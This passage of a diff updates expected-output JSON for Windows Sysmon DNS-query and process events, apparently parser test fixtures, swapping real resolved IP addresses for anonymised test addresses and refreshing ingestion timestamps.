ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -6678,12 +6595,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { 
@@ -6700,13 +6617,13 @@ "dsum-sec.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313818737Z", + "ingested": "2021-12-09T13:49:44.739383100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6770,12 +6687,12 @@ "type": "CNAME" }, { - "data": "72.167.239.239", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.167.239.239" + "89.160.20.156" ] }, "network": { 
@@ -6791,13 +6708,13 @@ "ocsp.godaddy.com" ], "ip": [ - "72.167.239.239" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313820065Z", + "ingested": "2021-12-09T13:49:44.739389Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -6869,7 +6786,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313821275Z", + "ingested": "2021-12-09T13:49:44.739395Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802587100Z'/\u003e\u003cEventRecordID\u003e118\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.315\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -6943,7 +6860,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313822485Z", + "ingested": "2021-12-09T13:49:44.739400900Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802678700Z'/\u003e\u003cEventRecordID\u003e119\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.315\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -6996,7 +6913,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313823824Z", + "ingested": "2021-12-09T13:49:44.739406800Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.981137800Z'/\u003e\u003cEventRecordID\u003e5\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.981\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cdf4-5c8f-0000-0010e61e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4616\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\AppData\\Local\\Temp\\Sysmon.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7060,11 +6977,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -7072,7 +6989,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -7080,7 +6997,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -7088,7 +7005,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -7096,21 +7013,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -7126,22 +7043,22 @@ "ocsp.usertrust.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313825183Z", + "ingested": "2021-12-09T13:49:44.739412600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", 
"provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7209,17 +7126,17 @@ "type": "CNAME" }, { - "data": "23.50.53.179", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.176", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.179", - "23.50.53.176" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -7236,14 +7153,13 @@ "isrg.trustid.ocsp.identrust.com" ], "ip": [ - "23.50.53.179", - "23.50.53.176" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313826402Z", + "ingested": "2021-12-09T13:49:44.739418600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7307,12 +7223,12 @@ "type": "CNAME" }, { - "data": "172.217.6.198", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.6.198" + "89.160.20.156" ] }, "network": { 
@@ -7328,13 +7244,13 @@ "ad.doubleclick.net" ], "ip": [ - "172.217.6.198" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313827600Z", + "ingested": "2021-12-09T13:49:44.739424500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
